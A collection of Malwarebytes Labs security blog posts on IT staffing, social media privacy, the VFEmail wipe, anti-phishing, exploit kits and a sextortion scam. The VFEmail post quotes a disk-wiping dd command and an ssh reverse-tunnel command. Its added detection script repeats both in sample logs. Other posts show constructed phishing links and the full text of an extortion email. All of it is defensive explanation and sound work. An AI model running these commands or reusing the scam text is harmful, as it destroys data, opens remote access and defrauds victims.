One important thing to consider is whether the company has adopted a user-centric or device-centric approach to technology integration. If every user is equipped with a device according to their personal preference, there could be a multitude of devices in use. This can be frustrating enough for a trained professional to deal with, let alone a volunteer who is about to find out that everything works just a little bit differently on their colleagues’ devices.

Determine at the outset the composition of your technology and workforce, and you can better structure a plan for your volunteers—and your IT staff, too.

Education and training

Training your entire staff in security basics will certainly result in less work for your IT staff. And while providing your employees with security awareness training is a good and necessary start, you can bolster support for your IT team by offering additional IT and security training to those who are interested. There are lots of useful training programs that deal with common issues found in the software that your employees are using on a daily basis. And if the trainee is motivated and interested (as we would expect from these volunteers), it shouldn’t take up a large amount of their time.

In addition to training, you’ll also want to set up a system of rewards for your volunteers, whether that’s monetary compensation, company swag (for example, custom hoodies designating them as IT helpers), or other perks. While many volunteers may be happy to help out of the goodness of their hearts, giving them additional incentive will only strengthen their commitment and attract others to the team.


Once the volunteers have received proper awareness training, equip them with the tools and authority to help their peers and make sure the rest of their department knows that they have been properly trained and can be asked for help with certain issues. This way, the people in that department are comfortable with asking for their help and will know when they can go to them instead of IT.

What this means: Volunteers will need access to certain software, systems, or cloud-based services. They’ll also need a way to communicate their actions to the IT team, so they’re aware of minor issues, even if they didn’t have to fix them themselves. Do they develop a ticketing system? Do they integrate with the current system for reporting issues? Do they spend an hour at the help desk?

No matter how you decide to enable your volunteer staff, make sure that they understand the consequences of their actions. Don’t tell them to “just do this” without explaining why you want it done that way. Give them some background so they can build out their expertise and learn how you want to run things.


Another important step is to give volunteers the administrative rights they need to make the actual changes themselves, and no more than they need. With the ongoing uptick in Bring Your Own Device (BYOD) policies, most of these users have learned how to make the necessary changes to their own devices, and how to troubleshoot some of the more common issues. They may even have some specialists outside of the company that they turn to when there are problems with the device that they consider their own.

One caveat: Make sure that the volunteer is informed about the risks of combining work and personal information on the same device—and what the consequences are if they don’t adhere to company policies. As always, clear communication is a key to success. Make sure everyone is aware of what is expected of them, and what they can expect in return.

Points of attention

Finding the right people to assist your IT staff with easy-to-fix issues or simple roll-outs can make your employees happier. The IT staff can concentrate on problems that are more challenging and don’t have to run around like headless chickens playing whack-a-mole for every minor problem, like users who just need to reboot, haven’t turned on the power, or are holding the mouse upside-down. Meanwhile, your volunteers will feel that their helpful attitude has paid off, and they are now officially allowed to help their peers.

The volunteers will need the training, tools, permission, and rewards to perform their new tasks. But, and we cannot stress this enough, they will also have to be informed about their boundaries. You don’t want to see them go overboard because they are reluctant to admit that something is over their head. Remember that difficult problems may show up as minor issues at first. So empower them to help, but make sure they know when to step aside. That way, the whole team can keep your organization secure.

The post Tackling the shortage in skilled IT staff: whole team security appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Should you delete yourself from social media?

Malware Bytes Security - Thu, 02/14/2019 - 12:30pm

You’re feeling like you’ve had enough. All the recent news—from Facebook’s Cambridge Analytica snafu to various abuses of Twitter vulnerabilities—has you wondering: Should I delete myself from social media?

Social networking does have its positive aspects. You can stay in touch with distant (or not) relatives, be included in the planning of social events within your circle of friends, get real-time updates on regional and national news, and promote your company, content, or other personal ventures. Plus, you get to experience all the cool memes a full two weeks after they’ve been posted on Reddit.

Then again, there are quite a few reasons—spanning security, privacy, and overall shady business practices—for leaving. In 2018 alone, Facebook experienced a security breach that impacted 50 million accounts, was responsible for a genocide incited using its platform, kept user data it said it deleted, and was caught abusing Apple development apps to test on children. Twitter, meanwhile, has not only been at the butt end of password bugs, hacks, and data breaches, but some could say it is these days a general dumpster fire of bot accounts.

Instagram and Snapchat are not without their flaws, either. Hackers are targeting influencer accounts on Insta, while Snapchat has been the recipient of phishing attacks and security breaches.

Unfortunately, we can’t make the decision to quit social media for you. Instead, we recommend you make a list of pros and cons. Consider what data might be lost. Consider what time and peace of mind might be gained. Weigh the rewards against the risks. If you come away feeling ready to take a step back, but not quite quit cold turkey, we can help you with ways to tighten security and privacy settings. And if that’s not enough, we’ll show you how to delete your accounts.

Let’s start slowly

If you’re not quite ready to cut the cord, a good option for cooling down on social media is to adjust the privacy settings on all of your accounts. This is a sensible thing to do, even if you aren’t considering leaving. It also has the bonus side effect of increasing awareness of just how much you share on social media.

In a previous blog, we discussed how to secure your social media profiles in great detail. We recommend users who aren’t deleting themselves read this first to understand the intricacies. Next, here’s a quick and dirty list of links to follow in order to adjust privacy settings across the top four social networking platforms:

After adjusting the settings, it’s a good idea to monitor and track your social media usage moving forward, either for the purpose of time management, focus, or beating social media addiction. As more and more of our media consumption moves to smart phones, you can leverage several apps that will help you achieve these goals. These include:

Goodbye, top four!

Let’s say you sat down, had a good think, and decided that it’s time to move on from social media. You can begin by collecting the appropriate links. Below, we’ve included links to download your data from the most popular platforms. You should download your personal information from these social networking sites prior to the nuclear option, should you experience remorse. Plus, it’s a real eye opener to find out exactly how much data you generate and share on social networking platforms.


Time to permanent deletion: Once 14 days have passed, your deletion request will be started. This can take upwards of 90 days to complete.


Time to permanent deletion: It takes up to 30 days for Twitter to completely delete your account.


Time to permanent deletion: Immediately!


Time to permanent deletion: 30 days


Ha ha ha, ho ho ho, he he he he. This one is mostly for the giggles. Google will abandon this particular endeavor on April 2, 2019. But if you feel the need to delete yourself before then, here’s what to do:

The right time

Security researchers love social media platforms. They’re a vast source of open-source intelligence (OSINT) and help us make attribution possible (provided your adversary has poor OPSEC). However, the very reasons we enjoy social media are also the reasons regular consumers should take a beat and weigh its benefits against the risks.

When you’re ready to make a decision, we’ve given you all the necessary links to back up and delete these accounts, as well as some material that may help you decide which ones to keep, and how to properly secure them.

If social media is causing anxiety, stress, or depression; if you’re tired of your data being mined and shared with third parties; if it’s starting to feel more like work to maintain instead of pleasure, then it may be time to shore up defenses and take a break, or even step away for good. And if that time comes, we’re here for you.

The post Should you delete yourself from social media? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Hacker destroys VFEmail service, wipes backups

Malware Bytes Security - Thu, 02/14/2019 - 11:56am

An email service called VFEmail was essentially put out of business after a hack intended to delete everything in (and out of) sight.

“Yes, @VFEmail is effectively gone. It will likely not return. I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.”

This wasn’t “just” a simple webpage compromise, or some sort of database dump. In fact, it was something altogether worse: put simply, the total annihilation of a service and most, if not all, of its infrastructure.

What happened?

Users of VFEmail woke to the following message on the service’s website:

Click to enlarge

!!!ALERT!!!! Update Feb 11 2019

vfemail(dot)net and mail(dot)vfemail(dot)net are currently unavailable.

We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv[redacted]

This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

New updates 2/11/19 6pm CST:

Incoming mail is now being delivered.

Webmail is up. Note: mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.

Mailboxes are new, no subfolders exist.

No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need. 

Click Filter, Click Script, then click ‘Activate Script’.

There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.

Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.

At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.

If you reconnect your client to your new mailbox, all your local mail will be lost.


Did they put word out on social media?

You bet they did, and the Tweets don’t make for pleasant reading:

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.

— (@VFEmail) 11 February 2019

Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@ -R -N

— (@VFEmail) 11 February 2019

It may sound a bit exciting to walk in on the scene of the crime, but I can assure you it’d only involve lots of “oh no” types of expression. If they’re already wiping your backups, the game is indeed over.

Did they recover?

Sadly things didn’t improve, and a few hours later the full damage report was available:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.

— (@VFEmail) 11 February 2019

All data was encrypted at least, but said data basically vanished into thin air when it was scrubbed:

Yep, but it doesn’t matter. They just formatted everything.

— (@VFEmail) 11 February 2019

They also managed to destroy various VMs using different forms of authentication.

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— (@VFEmail) 11 February 2019

“Just attack and destroy”

Services and sites have been attacked severely in the past, some to the point of destruction. However, there’s almost always an overt reason given, or a ransom, or some other clue.

Here, it’s nothing but complete devastation and a service in existence since 2001 absolutely ruined in the bargain. There’s no indication as to how they got in, or if an important system had no multi-factor authentication. A number of commentators have suggested this flaw may have been a way in for the attacker.

Until detailed analysis is published, it’s hard to say why this happened. Did the owner of the service aggravate a talented hacker? Or could one of the service users have drawn attention from unwanted sources, and this is the end result? It’ll be fascinating to find out. But if you operate a similar service, you may wish to consider a decent offline backup system in the meantime: one that cannot be reached with the same credentials, or from the same network, as the systems it protects, since here the attacker was logged into the backup server over ssh wiping it by hand.
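The two commands in the tweets above, a raw dd to a block device and an ssh session with host-key checking switched off, are exactly the kind of thing a process-audit log should raise an alarm on, ideally before the backup server is reached. The following Python script is an added example, not VFEmail’s tooling or anything from the original post: it parses a hypothetical audit-log format (timestamp, host=, user=, cmd=) and flags destructive writes and suspicious ssh invocations. The sample log lines, the reuse of the user name from the tweet, and the address 203.0.113.5 (a documentation range) are constructed for the demo.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List

# Raw block devices on Linux (sd*, vd*, nvme*, md*) and FreeBSD (da*, ada*);
# a raw write to one of these from an interactive shell is almost never
# legitimate on a mail or backup host. Extend the list for your own fleet.
BLOCK_DEV_RE = re.compile(r"^/dev/(sd[a-z]+|vd[a-z]+|nvme\d+n\d+|md\d+|da\d+|ada\d+)(p?\d+)?$")
DESTRUCTIVE_TOOLS = {"wipefs", "shred", "blkdiscard", "sgdisk"}

# Hypothetical audit-log format assumed for this example:
#   <timestamp> host=<name> user=<name> cmd=<full command line>
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.+)$")


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    rule: str
    cmd: str


def classify(cmd: str) -> List[str]:
    """Return the names of every rule a single command line trips."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable_command"]
    if not argv:
        return []
    prog = argv[0].rsplit("/", 1)[-1]
    args = argv[1:]
    rules = []
    if prog == "dd":
        # dd takes key=value operands; the wipe in the tweet was if=/dev/zero of=/dev/da0
        operands = dict(a.split("=", 1) for a in args if "=" in a)
        if BLOCK_DEV_RE.match(operands.get("of", "")):
            rules.append("dd_to_block_device")
    elif prog.startswith("mkfs") or prog in DESTRUCTIVE_TOOLS:
        if any(BLOCK_DEV_RE.match(a) for a in args):
            rules.append("destructive_tool_on_block_device")
    elif prog == "ssh":
        joined = " ".join(args)
        # Both options together mean "connect anywhere, verify nothing, remember nothing":
        # typical of tooling hopping between hosts it has never seen before.
        if "StrictHostKeyChecking=no" in joined and "UserKnownHostsFile=/dev/null" in joined:
            rules.append("ssh_host_key_checks_disabled")
        # -R together with -N: open a reverse tunnel and run no remote command at all.
        if "-R" in args and "-N" in args:
            rules.append("ssh_reverse_tunnel_no_shell")
    return rules


def scan(lines) -> List[Finding]:
    """Run classify() over audit-log lines; malformed lines are skipped."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        for rule in classify(m["cmd"]):
            findings.append(Finding(m["ts"], m["host"], m["user"], rule, m["cmd"]))
    return findings


# Constructed sample lines (not VFEmail's logs); only the dd and ssh shapes mirror the tweets.
SAMPLE_LOG = """\
2019-02-11T09:12:01Z host=backup1 user=ops cmd=rsync -a /srv/mail/ /backup/mail/
2019-02-11T09:40:17Z host=mail2 user=aktv cmd=ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@203.0.113.5 -R 2222:localhost:22 -N
2019-02-11T09:41:03Z host=backup1 user=aktv cmd=dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
2019-02-11T09:41:20Z host=backup1 user=ops cmd=dd if=/backup/mail.img of=/tmp/restore.img bs=1M
2019-02-11T09:42:55Z host=vm7 user=aktv cmd=mkfs.ext4 -F /dev/vda
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.ts} {f.host} {f.user} {f.rule}: {f.cmd}")
```

The rules are deliberately narrow (a dd whose output is a file is ignored, as the fourth sample line shows) so that the alert is worth paging on; the point is that a single user tripping several of them across several hosts in a few minutes is the signal, not any one command.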

The post Hacker destroys VFEmail service, wipes backups appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Businesses: It’s time to implement an anti-phishing plan

Malware Bytes Security - Wed, 02/13/2019 - 11:54am

Businesses: phishers aren’t just coming for you. They’re coming for your employees and your customers, too.

Phishing attacks are on the rise this year, thanks in part to massive Emotet and TrickBot campaigns, which make use of phishing emails to deliver their payloads. If you don’t already have one in place, then it’s time to implement an anti-phishing plan.

Where phishes are concerned, it doesn’t matter if the technique being used is revolutionary or old hat. Somebody, somewhere is going to fall for it. It’s up to you and your employees to ensure that your business is secure, and that your customers are performing safe email practices, too.

If your customers are logging into fake portals, eventually they’re going to tie up your support channels asking for help, refunds, reorders, and more. If your employees are being stung, they open the door to data theft, network infiltration, ransom demands, spying, and a massive dent in your company’s reputation to boot.

All of these are poor directions to head in. So let’s first take a look at some of the targets of phishing campaigns. Then, we’ll talk about what your employees and customers can do to identify a phish.

Targets for phishers

The 2018 Phishing Trends & Intelligence Report (PDF) from PhishLabs stated that Email/Online Services were the top targeted industry in the second half of 2017 by a margin of 26.1 percent, with a high concentration of phishing URLs mimicking Microsoft Office 365 login pages.

Office 365 is enormously popular for businesses, with Microsoft revealing in 2016 that it has:

  • 60 million active commercial customers
  • 50,000 small business customers added every month
  • 340 million downloads of its mobile app

As our 2019 State of Malware report shows, there’s no real sector of industry left alone by malware attackers. Trojans (which include Emotet and TrickBot) lured in targets in manufacturing, education, and retail in 2018 with phishing emails. And ransomware, which is also a popular payload of phishing attacks, crippled organizations in government, education, manufacturing, and retail.

Outside of those verticals, however, phishers know that every business is sitting on something juicy: personally identifiable information (PII). Just about any organization in any vertical is sitting on databases of customer names, emails, and their payment details.

That’s a huge number of potential targets at which to aim.

What should we do?

While it’s nearly impossible to predict every threat model, or what an attacker may want with your company’s data, you can better thwart phishing attacks by putting in place a clear anti-phishing plan. There’s never been a better time to start beefing up your cybersecurity policy for employees, as well as update your website with solid anti-phishing tips for your customers.

If you’re short of a few ideas on how to help your employees and customers identify phishing attempts, we have a handy introductory list below.

Anti-phishing tips for your employees
  1. Attachments aren’t always a guarantee of malware. Often, phishers will send perfectly clean files as an additional confidence trick. “Please fill this in and send it back,” they’ll say. Having said that, many phish campaigns will happily try to backdoor a network with a rogue file alongside a phish attempt. When in doubt, do not open the file. Instead, try to contact someone you know from the organization listed in the email to confirm.
  2. Mobile devices are particularly at risk from lengthy scam URLs, as the visible portion may be tailored to appear legitimate, but the rest of it—which would give the game away—is hidden offscreen. Employees checking email on their phones or browsing the Internet should always review the whole URL before clicking. If it looks suspicious, or uses numbers or peculiar letters in place of what you’d expect to be there, it’s best to leave immediately.
  3. Dubious apps are also a potential problem, so it’s best to review apps you plan to install on your work mobile device or desktop with a hawk eye. Are the logos the same? Does the user experience match what you’d expect?
  4. Promoted content on social media can lead to phishing, and it’s worth advising all employees and customers to be wary of this—especially as ads tend to be targeted to your interests (thanks, trackers). While you may not want to prohibit use of social media at work entirely (especially as it’s part of the job for many folks in marketing), recommending that users not engage on social media from work devices, or limiting their engagements to work-specific tasks, could help thwart phishing attempts.
  5. Bit of a niche one, but you may wish to advise employees not to waste spammers’/phishers’ time with any of these tactics during work hours. Using personal accounts is all fun and games, but replying with anything work-related could go terribly wrong. The bad guys then know your work mail exists for one thing, and they’ll either spam it hard, send you more junk, or go after your business even more than they were already.
Anti-phishing tips for your customers
  1. Look at some anti-phish pages from the biggest brands. You’ll notice that they all mention the most obvious forms of attack. If you’re eBay, you’re going to see customers sent fake auction missives, or “problem with your auction” attacks. If you’re Steam, it’ll be “problems with your marketplace item” or free game keys. A bank? It’ll be bogus re-authentication mails. For Apple, it’ll be issues with pending refunds for items they don’t remember purchasing. This is how you should lead the charge.
  2. Point out that the presence of a padlock isn’t a guarantee the site they’re on is real. Certificates for websites are easily obtained for free these days, and scammers are taking full advantage of it. It may have been useful to tell people “Avoid sites with no padlock because it isn’t real” years ago, but the game has changed and so must our messaging.
  3. Warn them about bad spelling, errors in formatting, and email addresses in the “From” field which look suspicious. Also mention that many phishers spoof mails in the “From” field so this isn’t a guarantee of safety either. Perhaps the formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. The possibilities are endless.
  4. Desperation is a surefire sign that something may be wrong. It’s panic buying, but not as we know it. Emails claiming a tight time limit to log in and perform an action, alongside the threat of losing X or Y forever, are a good sign of bad things afoot.
  5. Warn them off emails asking for additional personal information (and if your organization sends such emails, try to wean yourself off this practice, too). Links to sites asking for logins are bad practice. Train your customers and employees out of this habit. If they won’t click links asking for information, the battle is halfway won.
  6. The URL shown in the email and the URL that displays when you hover over the link are different from one another: if they don’t match, it’s a phish. An oldie, but goodie.
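Tips 2 and 6 above (URLs whose visible portion looks legitimate while the give-away tail sits off-screen, and a displayed link that does not match where it actually points) can be checked mechanically on an HTML mail body before it ever reaches a person. The script below is an added example, not Malwarebytes’ or Microsoft’s code: it extracts every anchor, compares the host a customer would read against the host they would actually land on, and flags raw-IP, punycode, deeply nested and brand-lookalike hostnames. The brand-to-domain table and the sample email are assumptions constructed for the demo; the registrable-domain helper is deliberately naive.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

# Brands we care about and the domains they legitimately use. This table is an
# assumption for the example; a real deployment keeps it per organisation.
BRANDS: Dict[str, Set[str]] = {
    "microsoft": {"microsoft.com", "office.com", "live.com"},
    "paypal": {"paypal.com"},
}
# Digit-for-letter substitutions commonly seen in lookalike hostnames (micr0soft, paypa1).
LOOKALIKE = str.maketrans("0135", "oles")
# Anchor text that itself reads like a URL or bare hostname (what the customer "sees").
URL_TEXT_RE = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML mail body."""

    def __init__(self):
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url: str) -> str:
    return (urlsplit(url if "://" in url else "http://" + url).hostname or "").lower()


def registrable(host: str) -> str:
    # Last two labels only; good enough here, a real system consults the Public Suffix List.
    return ".".join(host.split(".")[-2:])


def check_link(href: str, text: str) -> List[str]:
    """Return the reasons a single link looks like a phish (empty list = nothing found)."""
    reasons: List[str] = []
    host = host_of(href)
    if not host:                       # mailto:, javascript:, relative links: out of scope here
        return reasons
    m = URL_TEXT_RE.match(text)
    if m and registrable(m.group(1).lower()) != registrable(host):
        reasons.append("displayed_url_host_mismatch")    # tip 6: shown URL != real target
    if any(lbl.startswith("xn--") for lbl in host.split(".")):
        reasons.append("punycode_host")                   # IDN homograph candidate
    if IPV4_RE.match(host):
        reasons.append("raw_ip_host")
    if host.count(".") >= 4 or len(host) > 60:
        reasons.append("long_or_deeply_nested_host")      # tip 2: real-looking prefix, tail off-screen
    reg = registrable(host)
    labels = host.split(".")
    for brand, legit in BRANDS.items():
        if reg in legit:
            continue                                      # genuinely the brand's own domain
        if any(brand in lbl for lbl in labels):
            reasons.append(f"brand_{brand}_outside_legit_domain")
        elif any(brand in lbl.translate(LOOKALIKE) for lbl in labels):
            reasons.append(f"brand_{brand}_lookalike")
    return reasons


def analyze_email(html: str) -> List[Tuple[str, List[str]]]:
    parser = LinkCollector()
    parser.feed(html)
    return [(href, check_link(href, text)) for href, text in parser.links]


# Constructed sample mail body (not a real campaign); 203.0.113.7 is a documentation address
# and the xn-- label is just a punycode-shaped hostname for the demo.
SAMPLE_EMAIL = """\
<p>Your Office 365 mailbox is almost full. Act within 24 hours to avoid losing mail.</p>
<p><a href="https://login.microsoft.com.mailbox-quota-verify.example/owa">https://login.microsoft.com/owa</a></p>
<p><a href="http://203.0.113.7/o365/">Review storage</a></p>
<p><a href="https://micr0soft-support.example/reset">https://micr0soft-support.example/reset</a></p>
<p><a href="https://xn--80ak6aa92e.example/">apple.com</a></p>
<p><a href="https://www.microsoft.com/en-us/microsoft-365">Learn more about Microsoft 365</a></p>
"""

if __name__ == "__main__":
    for href, reasons in analyze_email(SAMPLE_EMAIL):
        print(f"{'PHISH' if reasons else 'ok   '} {href} {reasons}")
```

Only the last link comes back clean; the first one trips three rules at once, which is the usual pattern for the mobile trick in tip 2, where “login.microsoft.com” is all the screen shows.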
My business uses Office365, what else can I do?

Microsoft has a handy list of security suggestions for you to deploy on your network. Suggestions include:

And finally

Google has come up with a short, fun, and difficult anti-phishing test. It’s a fantastic way to experience some common phishing techniques safely. There aren’t many ways to experience real phishing examples in a safe environment, so it’s well worth having a go. You’ll likely find that there’s a few tactics in there you haven’t seen before, and it’s always a good idea to test your employees on some left-field phishing techniques. However you choose to go about putting together an anti-phishing plan for your organization, we wish you many years of safe emailing ahead.

The post Businesses: It’s time to implement an anti-phishing plan appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Exploit kits: winter 2019 review

Malware Bytes Security - Tue, 02/12/2019 - 11:00am

Active malvertising campaigns in December and the new year have kept exploit kit activity from hibernating in winter 2019. We mostly observed Fallout and RIG with the occasional, limited GrandSoft appearance for wider geo-targeting.

In addition, narrowly-focused exploit kits such as Magnitude, Underminer, and GreenFlash Sundown stayed on the same track: delivering ransomware to mostly Asian countries, and South Korea in particular.

Winter 2019 overview
  • Fallout EK
  • RIG EK
  • GrandSoft EK
  • Magnitude EK
  • Underminer EK
  • GreenFlash Sundown EK

Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878 continue to be the most common vulnerabilities across the board, even though a couple exploit kits have now integrated the newer Flash CVE-2018-15982.

Fallout EK

Fallout keeps bringing fresh air into an otherwise stale atmosphere by introducing new features and even adopting newer vulnerabilities. It also appears to be a good experimental framework for some actors who have customized the payload delivery. Fallout was the second exploit kit to add CVE-2018-15982, a more recent vulnerability for the Flash Player.


RIG EK

Good old RIG is still kicking around, but has taken a back seat to the newer Fallout in many of the malvertising chains we track, except perhaps for Fobos. There haven’t been any notable changes to report since we last reviewed it.

GrandSoft EK

GrandSoft and its Ramnit payload still go hand-in-hand via limited distribution tied to compromised websites. It is perhaps one of the least sophisticated exploit kits on the market right now.

Magnitude EK

Meanwhile, Magnitude EK is active and served up via malvertising chains, with a focus on some APAC countries like South Korea. Magnitude continues to deliver its fileless Magniber ransomware payload.

Underminer EK

Underminer’s over-the-top encryption schemes to hide its exploits are keeping us researchers honest when trying to identify exactly what is under the hood. It’s worth noting that only a few days after the Flash zero-day and Proof of Concept (PoC) had been published (CVE-2018-15982), Underminer was already implementing it.

GreenFlash Sundown EK

Also a geo-specific exploit kit, GreenFlash Sundown has been delivering various breeds of ransomware to targets in Asia. In our latest capture, we saw it drop the Seon ransomware on South Korean users.


While timely patching and avoidance of Internet Explorer as a web browser would offer protection against the above-mentioned exploit kits, the reality is that many users (especially in corporate environments) are still trailing behind. In addition, while IE is being phased out in North America, it’s still highly adopted in Asian countries—which explains why they are currently being targeted.

Malwarebytes’ anti-exploit technology blocks each of these exploit kits—Fallout, RIG, GrandSoft, Magnitude, Underminer, and GreenFlash Sundown—before they even have a chance to drop their payload.

As we move further into 2019, we can say that exploit kits, while nowhere near their peak activity in 2017, are still hanging on, being used primarily in malvertising distribution campaigns. In terms of global activity, Fallout is leading the charge, providing the most diverse campaigns and payloads. Meanwhile, the Asia-specific EKs are for the most part continuing on with their usual pattern of driving innovation (to a degree) and distributing ransomware.

The post Exploit kits: winter 2019 review appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Sextortion Bitcoin scam makes unwelcome return

Malware Bytes Security - Mon, 02/11/2019 - 1:38pm

Heads up: a particularly nasty sextortion Bitcoin scam from at least the middle of 2018 is making the rounds once again.

The scam involves making use of old breach dumps, then emailing someone from the list and reminding them of their old password.

When something lands in your mailbox with “Hey, remember this?” it’s a surefire way to focus the reader’s attention. Pressure is then applied to start sending over some Bitcoin…or else.

What is the threat being made?

The generally accepted theory is that the scammer digs up personally identifiable information from old data breaches, including email addresses and passwords, plugs it into some sort of automated script, and then fires out thousands of emails.

Those mails reach people from said breach, and they then see talk of somebody “knowing” their login details. That’s then used as leverage to claim the attacker has access to their PC, files, folders, webcams, browsing history—in a nutshell, anything personal and sensitive. The scarier they can make it sound, the better. In fact, one of the more eye-popping claims is that the scammer has video of the user viewing adult websites, and they will share this video with all the user’s contacts unless they pony up and pay a Bitcoin ransom.

And in classic ransomware fashion, there’s typically a ticking clock. Giving users a short time limit to deliver the payment is social engineering at its finest.

What next?

The recipient may well have a panic attack, that’s what. To be suddenly confronted with an ancient (but potentially still active) password is certainly going to give a bit of a shock to the system. It’s at this point the confusion sets in, as they start to wonder what on Earth the attacker has. Did they really see what they claimed to see? Do they actually have video footage? What other potentially embarrassing (or worse) content could they use to extort and blackmail?

What do they really have?

A large throne of lies, is what.

Yes, they have your password from a long time ago.

No, they do not have access to your computer. And no, even if you were checking out adult sites, they don’t have video of you doing so.

What they might have is access to your email account associated with the breach, if you haven’t changed the password since it took place. They could also potentially start trying to log into other accounts you have with the same password. If this is the case, you should fire up a password manager and get to work changing things.

In fact, you should do that if you share passwords across accounts in any case.

Okay, back to the scam.

What does the email say?

It’s a fairly standard template, and hunting for portions of the below mail will throw up any number of hits in Google and other search engines.

Click to enlarge

The email reads as follows:

I am well aware [REDACTED] is your pass words. Lets get right to point. Neither anyone has paid me to investigate you. You may not know me and you are probably thinking why you’re getting this e-mail? 

actually, i installed a software on the adult videos (pornographic material) web-site and do you know what, you visited this website to have fun (you know what i mean). While you were viewing videos, your web browser began working as a Remote Desktop that has a keylogger which gave me accessibility to your display and also cam. Just after that, my software gathered every one of your contacts from your Messenger, Facebook, as well as email . after that i created a double video. 1st part displays the video you were viewing (you’ve got a nice taste haha), and next part shows the recording of your cam, yeah its you. 

You have not one but two choices. Shall we read up on these options in aspects: 

First alternative is to just ignore this message. in such a case, i am going to send out your actual video to every single one of your personal contacts and think regarding the awkwardness you will definitely get. and definitely if you happen to be in a loving relationship, how it would affect? 

Number 2 solution is to pay me $889. Lets name it as a donation. in this situation, i most certainly will asap remove your video footage. You could carry on daily life like this never occurred and you surely will never hear back again from me.

You’ll make the payment through Bi‌tco‌in (if you don’t know this, search for ‘how to buy b‌itcoi‌n’ in Google). 

B‌T‌C‌ ad‌dre‌ss to send to: [REDACTED]

[CaSe sensitive, copy & paste it] 

if you are wondering about going to the law enforcement officials, well, this message can not be traced back to me. I have dealt with my actions. i am also not attempting to demand a huge amount, i would like to be compensated. within this%} emaiQUNdkpeC [SIC] if i do not receive the ‌bi‌tco‌in‌, i will send your video recording to all of your contacts including family members, coworkers, and so forth. Having said that, if i receive the payment, i will erase the recording immediately. If you really want proof, reply Yup then i will send out your video to your 9 friends. This is a non-negotiable offer, so don’t waste mine time and yours by replying to this e mail.

That’s pretty sneaky

It is, and I’d be surprised if there aren’t many others waking up to emails identical to the above. Should you receive one yourself, do the following:

  1. Don’t panic. They absolutely do not have the keys to your computer.
  2. See if the email in question pops up over on Haveibeenpwned.
  3. See if your password does the same thing.
  4. At this point, you may have a fairly good idea which breach they grabbed your old login from, which is always useful information to have.
  5. Delete the email you were sent, and under no circumstances pay them a penny/dime/insert currency of choice here.

Scare tactics: an evil practice

The anonymous sender of these mails doesn’t care about the trauma they could cause at the other end. These missives would be particularly traumatic for anyone involved in (say) a revenge porn case previously. And make no mistake, generic Internet blackmail threats can kill.

If you’re able to report these mails for spam/abuse before deleting, do so. There’s a remote chance you could actually save someone’s life while making the Internet a little safer into the bargain.

The post Sextortion Bitcoin scam makes unwelcome return appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (February 4 – 8)

Malware Bytes Security - Mon, 02/11/2019 - 12:05pm

Last week on Malwarebytes Labs, we took a closer look at the technical and reputational challenges for Facebook as it tries to integrate secure messaging across Messenger, WhatsApp, and Instagram. We explored Google’s latest attempts to change how the public sees—literally—web browser URLs, gave some of our best tips on how to safely browse the Internet at work, and detailed a unique spam campaign involving ebooks, the Amazon Kindle web store and… John Wick? Yep.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (February 4 – 8) appeared first on Malwarebytes Labs.


Compromising vital infrastructure: communication

Malware Bytes Security - Fri, 02/08/2019 - 2:09pm

Have you ever been witness to a Wi-Fi failure in a household with school-aged children? If so, I don’t have to convince you that communication qualifies as vital infrastructure. For the doubters: when you see people risking their lives in traffic just to check their phone, you’ll understand why most adults consider instant communication to be vital as well.

Forms of communication

Humanity has come a long way in communication techniques. From drawings on the cave wall to wartime messages sent via courier to the Pony Express and now, the Internet. Modern communication tools enable us to reach most places across the world in a matter of seconds.

What are the lines of communications that are more or less vital to our everyday life?

  • The Internet
  • Telephone lines
  • Mobile telephone networks
